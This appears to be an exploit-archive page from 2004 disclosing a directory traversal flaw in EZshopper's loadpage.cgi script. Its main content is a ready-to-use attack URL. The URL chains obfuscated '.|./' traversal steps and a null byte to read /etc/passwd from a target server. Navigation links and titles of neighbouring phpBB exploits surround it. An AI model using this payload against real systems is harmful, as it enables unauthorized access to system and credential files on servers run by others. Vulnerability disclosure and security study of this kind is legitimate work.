[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : EZshopper Directory Transversal in loadpage.cgi
# Published : 2004-11-25
# Author : Zero X
# Previous Title : phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
# Next Title : phpBB <= 2.0.10 Remote Command Execution Exploit


Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# www.Syue.com [2004-11-25]